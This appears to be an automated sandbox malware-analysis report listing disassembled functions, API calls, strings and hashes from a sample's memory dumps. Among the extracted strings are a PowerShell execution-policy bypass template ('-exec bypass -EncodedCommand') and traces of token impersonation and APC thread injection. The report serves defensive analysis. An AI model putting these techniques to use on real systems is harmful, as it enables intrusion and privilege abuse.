                    • Instruction ID: 2896283ac4f2a1ac83dbb9fac2a01ee60df2fa2cca1931e9dd44a3f7c29ad242
                    • Opcode Fuzzy Hash: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
                    • Instruction Fuzzy Hash: 3D32547220868686EF29EF15D5643BE6FB3FB45B94F241305DE4A17B68DB78C841CB40
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001C23FD
                      • Part of subcall function 001C0A00: _getptd.LIBCMT ref: 001C0A16
                      • Part of subcall function 001C0A00: __updatetlocinfo.LIBCMT ref: 001C0A4B
                      • Part of subcall function 001C0A00: __updatetmbcinfo.LIBCMT ref: 001C0A72
                    • _errno.LIBCMT ref: 001C2402
                      • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                    • _fileno.LIBCMT ref: 001C242F
                      • Part of subcall function 001C4E54: _errno.LIBCMT ref: 001C4E5D
                      • Part of subcall function 001C4E54: _invalid_parameter_noinfo.LIBCMT ref: 001C4E68
                    • write_multi_char.LIBCMT ref: 001C2A6B
                    • write_string.LIBCMT ref: 001C2A88
                    • write_multi_char.LIBCMT ref: 001C2AA5
                    • write_string.LIBCMT ref: 001C2B04
                    • write_string.LIBCMT ref: 001C2B3B
                    • write_multi_char.LIBCMT ref: 001C2B5D
                    • free.LIBCMT ref: 001C2B71
                    • _isleadbyte_l.LIBCMT ref: 001C2C42
                    • write_char.LIBCMT ref: 001C2C58
                    • write_char.LIBCMT ref: 001C2C79
                    • _errno.LIBCMT ref: 001C2D7C
                    • _invalid_parameter_noinfo.LIBCMT ref: 001C2D87
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                    • String ID: $@
                    • API String ID: 3318157856-1077428164
                    • Opcode ID: 0917c7b026fa98026fd61c82a9db6b94b013ed73c29c4ccbf17a38093d3ada48
                    • Instruction ID: 894fc212aefd36256bb4a76e233e0adf7cc69257a1cca1681f47039ea8f6e663
                    • Opcode Fuzzy Hash: 0917c7b026fa98026fd61c82a9db6b94b013ed73c29c4ccbf17a38093d3ada48
                    • Instruction Fuzzy Hash: E8421032608B9487EB29CF59D544FBE7BB0B775B84F24100EDE4A47AA8DB78C840CB01
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001C1989
                      • Part of subcall function 001C0A00: _getptd.LIBCMT ref: 001C0A16
                      • Part of subcall function 001C0A00: __updatetlocinfo.LIBCMT ref: 001C0A4B
                      • Part of subcall function 001C0A00: __updatetmbcinfo.LIBCMT ref: 001C0A72
                    • _errno.LIBCMT ref: 001C198E
                      • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                    • _fileno.LIBCMT ref: 001C19BB
                      • Part of subcall function 001C4E54: _errno.LIBCMT ref: 001C4E5D
                      • Part of subcall function 001C4E54: _invalid_parameter_noinfo.LIBCMT ref: 001C4E68
                    • write_multi_char.LIBCMT ref: 001C1FEB
                    • write_string.LIBCMT ref: 001C2008
                    • _errno.LIBCMT ref: 001C22F3
                    • _invalid_parameter_noinfo.LIBCMT ref: 001C22FE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$Locale_invalid_parameter_noinfo$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexitwrite_multi_charwrite_string
                    • String ID: -$0
                    • API String ID: 3246410048-417717675
                    • Opcode ID: 9d83564e1f44511746efc6243833ea10ca1e0c0cc6e5e094e442fc0115aecad6
                    • Instruction ID: a41121ecebb48c11a1d8c2787aaf8ced3d8e74097b573b9f87d3053120b2844f
                    • Opcode Fuzzy Hash: 9d83564e1f44511746efc6243833ea10ca1e0c0cc6e5e094e442fc0115aecad6
                    • Instruction Fuzzy Hash: 8D3225726486D496EB29CB55D544FBE7BB0F776784F28100EEF4A47AA9DB38C840CB00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: __doserrno_errno_invalid_parameter_noinfo
                    • String ID: U
                    • API String ID: 3902385426-4171548499
                    • Opcode ID: 1e306023ed328bab19b7a5d60cdebdd92491a2c212ad1309fcb9b443deab4914
                    • Instruction ID: 22f53ffff2642abfb00545f65aa01530eb72d904a6e8a21be2e57ddf3167229a
                    • Opcode Fuzzy Hash: 1e306023ed328bab19b7a5d60cdebdd92491a2c212ad1309fcb9b443deab4914
                    • Instruction Fuzzy Hash: F7022533214B8186DB208F28E484BAEB776F7A5798F54011EEB8943B54DF3DE985CB10
                    APIs
                    • _snprintf.LIBCMT ref: 00677D66
                    • _snprintf.LIBCMT ref: 00677D83
                    • _snprintf.LIBCMT ref: 00677CA5
                      • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                      • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                    • _snprintf.LIBCMT ref: 00677FD8
                    • _snprintf.LIBCMT ref: 00678334
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _snprintf$_errno_invalid_parameter_noinfo
                    • String ID: %s%s$%s%s$%s%s: %s$%s&%s$%s&%s=%s$?%s$?%s=%s
                    • API String ID: 3442832105-1222817042
                    • Opcode ID: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
                    • Instruction ID: f165d54bb1ff977ae2693509bbd572190c045ac707b9e2ef795a30137aa3c4d4
                    • Opcode Fuzzy Hash: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
                    • Instruction Fuzzy Hash: B032E962614E8592EB258F2DE0452E9B3B1FF98799F049101EF8D17B21EF38D6A7C344
                    APIs
                    • malloc.LIBCMT ref: 00671C63
                      • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                      • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                      • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                      • Part of subcall function 0066D044: malloc.LIBCMT ref: 0066D057
                      • Part of subcall function 0066D074: htonl.WS2_32 ref: 0066D07F
                    • GetCurrentDirectoryA.KERNEL32 ref: 00671CDB
                    • FindFirstFileA.KERNEL32 ref: 00671D14
                    • GetLastError.KERNEL32 ref: 00671D23
                    • free.LIBCMT ref: 00671D5E
                    • free.LIBCMT ref: 00671D6B
                      • Part of subcall function 0067F244: HeapFree.KERNEL32 ref: 0067F25A
                      • Part of subcall function 0067F244: _errno.LIBCMT ref: 0067F264
                      • Part of subcall function 0067F244: GetLastError.KERNEL32 ref: 0067F26C
                    • FileTimeToSystemTime.KERNEL32 ref: 00671D78
                    • SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 00671D89
                    • FindNextFileA.KERNEL32 ref: 00671E46
                    • FindClose.KERNEL32 ref: 00671E57
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$FileFind_errno$ErrorHeapLastSystemfreemalloc$AllocCloseCurrentDirectoryFirstFreeLocalNextSpecific_callnewhhtonl
                    • String ID: %s$.\*$D0%02d/%02d/%02d %02d:%02d:%02d%s$F%I64d%02d/%02d/%02d %02d:%02d:%02d%s
                    • API String ID: 723279517-1754256099
                    • Opcode ID: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
                    • Instruction ID: fb2f42af140046c5152ca76007fff4314e7617e9a63a981f5e9d9da63bfdfffd
                    • Opcode Fuzzy Hash: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
                    • Instruction Fuzzy Hash: D051CF7270875196DB50DF66E8507AEA3A2F385B84F40402AEE4E47B58EF7CC60ACB40
                    APIs
                    • _snprintf.LIBCMT ref: 001B7166
                    • _snprintf.LIBCMT ref: 001B7183
                    • _snprintf.LIBCMT ref: 001B70A5
                      • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                      • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                    • _snprintf.LIBCMT ref: 001B73D8
                    • _snprintf.LIBCMT ref: 001B7734
                    Strings
                    • not create token: %d, xrefs: 001B7657
                    • nop -exec bypass -EncodedCommand "%s", xrefs: 001B74D7
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _snprintf$_errno_invalid_parameter_noinfo
                    • String ID: nop -exec bypass -EncodedCommand "%s"$not create token: %d
                    • API String ID: 3442832105-3652497171
                    • Opcode ID: 5c5fb6f4a09e06ccff5c46792293312cb34477fc99d63142bfc01bcec4b0117e
                    • Instruction ID: 2f9b2cb9d9b2c9bc8f052c9aa5cc4283acf63cc8586ad332c123fcfba5c15db3
                    • Opcode Fuzzy Hash: 5c5fb6f4a09e06ccff5c46792293312cb34477fc99d63142bfc01bcec4b0117e
                    • Instruction Fuzzy Hash: 5732FC62618EC492EB259F2DE0413E9B3B0FFA8799F445501DF8917B65EF38D2A6C340
                    APIs
                    • CreateProcessAsUserA.ADVAPI32 ref: 00670F8F
                    • GetLastError.KERNEL32 ref: 00670F9D
                    • GetLastError.KERNEL32 ref: 00670FC1
                      • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FE81
                      • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FEA9
                    • CreateProcessA.KERNEL32 ref: 00671013
                    • GetLastError.KERNEL32 ref: 0067101D
                    • GetCurrentDirectoryW.KERNEL32 ref: 00671374
                    • GetCurrentDirectoryW.KERNEL32 ref: 00671388
                    • CreateProcessWithTokenW.ADVAPI32 ref: 006713D1
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateErrorLastProcess$ByteCharCurrentDirectoryMultiWide$TokenUserWith
                    • String ID:
                    • API String ID: 3044875250-0
                    • Opcode ID: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
                    • Instruction ID: ddd496feb17ee8c2b893683ede9fb43acc4ce5d056f1b139581cf5cf7671d55c
                    • Opcode Fuzzy Hash: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
                    • Instruction Fuzzy Hash: EA619B72214B40D6EB20DF25E89435E73A6F749B94F10812AEA4E87B18DF7DC8A5CB50
                    APIs
                    • malloc.LIBCMT ref: 0067924F
                      • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                      • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                      • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                    • _snprintf.LIBCMT ref: 00679267
                      • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                      • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                    • FindFirstFileA.KERNEL32 ref: 00679272
                    • free.LIBCMT ref: 0067927E
                      • Part of subcall function 0067F244: HeapFree.KERNEL32 ref: 0067F25A
                      • Part of subcall function 0067F244: _errno.LIBCMT ref: 0067F264
                      • Part of subcall function 0067F244: GetLastError.KERNEL32 ref: 0067F26C
                    • malloc.LIBCMT ref: 006792CE
                    • _snprintf.LIBCMT ref: 006792E6
                    • free.LIBCMT ref: 0067930E
                    • FindNextFileA.KERNEL32 ref: 00679327
                    • FindClose.KERNEL32 ref: 00679338
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$Find$FileHeap_snprintffreemalloc$AllocCloseErrorFirstFreeLastNext_callnewh_invalid_parameter_noinfo
                    • String ID: %s\*
                    • API String ID: 2620626937-766152087
                    • Opcode ID: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
                    • Instruction ID: b9f7dc96f4b337169066c32773aa2e023003f420f908839e69a4b092d4227770
                    • Opcode Fuzzy Hash: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
                    • Instruction Fuzzy Hash: 5831D5113046C255DA15AB636C207B97BA7B74AFE0F88C125DEED0BB96CE39C563C314
                    APIs
                    • RtlCaptureContext.KERNEL32 ref: 00401A84
                    • RtlLookupFunctionEntry.KERNEL32 ref: 00401A9B
                    • RtlVirtualUnwind.KERNEL32 ref: 00401ADD
                    • SetUnhandledExceptionFilter.KERNEL32 ref: 00401B21
                    • UnhandledExceptionFilter.KERNEL32 ref: 00401B2E
                    • GetCurrentProcess.KERNEL32 ref: 00401B34
                    • TerminateProcess.KERNEL32 ref: 00401B42
                    • abort.MSVCRT ref: 00401B48
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
                    • String ID: @5E
                    • API String ID: 4278921479-727458683
                    • Opcode ID: 03ff3d805c6c5b31210b554aa0805c21f9c7c8b799266a99dd13c5c6293e079e
                    • Instruction ID: d9c1a563eddaf3b5510b4e3cdc57f7cc7ddb545808ab7069b32be6ef691eb8bd
                    • Opcode Fuzzy Hash: 03ff3d805c6c5b31210b554aa0805c21f9c7c8b799266a99dd13c5c6293e079e
                    • Instruction Fuzzy Hash: A021E4B5601F55A6EB008F66FC8438A33B4B748BCAF500126EE4E5776AEF38C255C748
                    APIs
                    • GetModuleHandleA.KERNEL32 ref: 00673ACE
                    • GetProcAddress.KERNEL32 ref: 00673ADE
                      • Part of subcall function 00673984: malloc.LIBCMT ref: 006739C2
                      • Part of subcall function 00673984: free.LIBCMT ref: 00673A45
                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00673B10
                    • Thread32Next.KERNEL32 ref: 00673B7A
                    • Sleep.KERNEL32 ref: 00673B90
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressCreateHandleModuleNextProcSleepSnapshotThread32Toolhelp32freemalloc
                    • String ID: NtQueueApcThread$ntdll
                    • API String ID: 1427994231-1374908105
                    • Opcode ID: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
                    • Instruction ID: 173fb5629102f313e9d9874a9f15bb623e96bfa68c595a2679f6e732873ab5c7
                    • Opcode Fuzzy Hash: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
                    • Instruction Fuzzy Hash: 1A418B32701B519AEB20CB62E8407ED73B6FB58B88F54812ADE4D97B18EF39C645C744
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: bindclosesockethtonsioctlsocketlistensocket
                    • String ID:
                    • API String ID: 1767165869-0
                    • Opcode ID: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
                    • Instruction ID: 20277dcdf1c343fd712384b8841c0a27075375c39bd243faa5f60102d07d7b9e
                    • Opcode Fuzzy Hash: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
                    • Instruction Fuzzy Hash: 89112631310B5482DB248F16E420359B762F788FA4F858634EE5E53B64CF3DD456C700
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: bindclosesockethtonlhtonsioctlsocketsocket
                    • String ID:
                    • API String ID: 3910169428-0
                    • Opcode ID: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
                    • Instruction ID: d8364017e29b8a6f0fc31d9fb4209b82eade7849c5e9f444018a36658612b3d4
                    • Opcode Fuzzy Hash: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
                    • Instruction Fuzzy Hash: 0111B135311B4097D7249F21E8243997762F788BA4F958239DE1A43794DF3DC95AC740
                    APIs
                      • Part of subcall function 0067DCC0: RevertToSelf.ADVAPI32 ref: 0067DCDD
                    • LogonUserA.ADVAPI32 ref: 0067DF98
                    • GetLastError.KERNEL32 ref: 0067DFA2
                      • Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008
                      • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FE81
                      • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FEA9
                      • Part of subcall function 0066D044: malloc.LIBCMT ref: 0066D057
                    • ImpersonateLoggedOnUser.ADVAPI32 ref: 0067DFC0
                    • GetLastError.KERNEL32 ref: 0067DFCA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharErrorLastMultiUserWidemalloc$ImpersonateLoggedLogonRevertSelf
                    • String ID: %s\%s
                    • API String ID: 3621627092-4073750446
                    • Opcode ID: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
                    • Instruction ID: c23be3ee67aa09ac1aac6bdd0082120723da9cefab7562a0a514cdcd65bd2716
                    • Opcode Fuzzy Hash: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
                    • Instruction Fuzzy Hash: 1A318B30314B4191EB40FB22F86435A23A7FB8AB80F804029EA4E57F66DF3EC165CB45
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountSleepTick$closesocket
                    • String ID:
                    • API String ID: 2363407838-0
                    • Opcode ID: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
                    • Instruction ID: 225c3144836ed55f75402d078613cef5556b0c92f46d9bf16291872aee3931d8
                    • Opcode Fuzzy Hash: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
                    • Instruction Fuzzy Hash: A711D221704A8092CA50EB62F45521AA392F785BF0F444735FEBE47BE6DE3CC6468B45
                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32 ref: 004019D5
                    • GetCurrentProcessId.KERNEL32 ref: 004019E0
                    • GetCurrentThreadId.KERNEL32 ref: 004019E8
                    • GetTickCount.KERNEL32 ref: 004019F0
                    • QueryPerformanceCounter.KERNEL32 ref: 004019FE
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                    • String ID:
                    • API String ID: 1445889803-0
                    • Opcode ID: 50bcba46724f9b704bab53f94a1f403ca93275f12098583a90ed55ecc7962461
                    • Instruction ID: e7f875539d2b8dca624fb493ee906b0c7b4db546ccc53074c796ddc42d9a9937
                    • Opcode Fuzzy Hash: 50bcba46724f9b704bab53f94a1f403ca93275f12098583a90ed55ecc7962461
                    • Instruction Fuzzy Hash: 09115EA6756B1482FB109B65FC0431973A0B788BF5F081671AE9D47BA4DE3CC589D708
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: bindclosesockethtonslistensocket
                    • String ID:
                    • API String ID: 564772725-0
                    • Opcode ID: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
                    • Instruction ID: 7639010fca12233a93f18edaacb0714942ccd48183b1a2ce934c52e116504c89
                    • Opcode Fuzzy Hash: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
                    • Instruction Fuzzy Hash: 8D110435614B5582DB20EF12E82531AB362F788FE0F548665EE9D07FA4DF7EC1198704
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: %s!%s
                    • API String ID: 0-2935588013
                    • Opcode ID: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
                    • Instruction ID: 339d4963c7e48f7d5eab9816edd3ce58a4595f6ab105ea75f3ca995b74269556
                    • Opcode Fuzzy Hash: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
                    • Instruction Fuzzy Hash: A2518D76B04A80C6DB24DF66D0406A97362F388FD8F84852AEF8E57758DF38C942C744
                    APIs
                    • LookupPrivilegeValueA.ADVAPI32 ref: 00670BEA
                    • AdjustTokenPrivileges.ADVAPI32 ref: 00670C1A
                    • GetLastError.KERNEL32 ref: 00670C24
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                    • String ID: %s
                    • API String ID: 4244140340-620797490
                    • Opcode ID: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
                    • Instruction ID: 2d8aa08465468c05ae3a8d0ae3c732c9e61822b2c26229a58da37efd2c490324
                    • Opcode Fuzzy Hash: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
                    • Instruction Fuzzy Hash: 8C217C72B00B01AAEB14DB71D4557ED73B6F758B88F84852A9E4C93B48EF74C629C390
                    APIs
                    • GetTickCount.KERNEL32 ref: 0067587B
                    • Sleep.KERNEL32 ref: 006758CA
                    • GetTickCount.KERNEL32 ref: 006758D0
                    • WSAGetLastError.WS2_32 ref: 006758DA
                      • Part of subcall function 00675A20: ioctlsocket.WS2_32 ref: 00675A42
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountTick$ErrorLastSleepioctlsocket
                    • String ID:
                    • API String ID: 1121440892-0
                    • Opcode ID: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
                    • Instruction ID: fcd2c79b4b1f667fb8cce6bcefae5cc02d7a34ed8ad0a29df97c4b622c4aa0d8
                    • Opcode Fuzzy Hash: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
                    • Instruction Fuzzy Hash: 77316B36B00F40D6DB00DBA2E4942AC77BAF388B90F51466ADE6E93B94DE31C555C344
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: $<$ailure #%d - %s$e '
                    • API String ID: 0-963976815
                    • Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                    • Instruction ID: 875dd6fd0587a974ac1acf23bae3dc22a9181987aed168fd786f8758df7145ac
                    • Opcode Fuzzy Hash: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                    • Instruction Fuzzy Hash: 7D92D3B2329A8087DB58CB1DE4A173AB7A1F3C8B84F44512AE79B87794CE3CD551CB44
                    APIs
                      • Part of subcall function 00676114: htonl.WS2_32 ref: 00676131
                    • GetLastError.KERNEL32 ref: 0066DD33
                      • Part of subcall function 0067CC00: GetCurrentProcess.KERNEL32 ref: 0067CC8D
                    • HeapCreate.KERNEL32 ref: 0066DCDA
                    • HeapAlloc.KERNEL32 ref: 0066DCF8
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocCreateCurrentErrorLastProcesshtonl
                    • String ID:
                    • API String ID: 3419463915-0
                    • Opcode ID: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
                    • Instruction ID: 52fe5b68eb4c93ed57c1751ba93f5dd3d32ebf759edd96eaf3318f5250c8f75b
                    • Opcode Fuzzy Hash: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
                    • Instruction Fuzzy Hash: 21E1B1B3B10B4187EB64DB35E8413AA63A2F799794F088125DB8E97B55EF3DE446C300
                    APIs
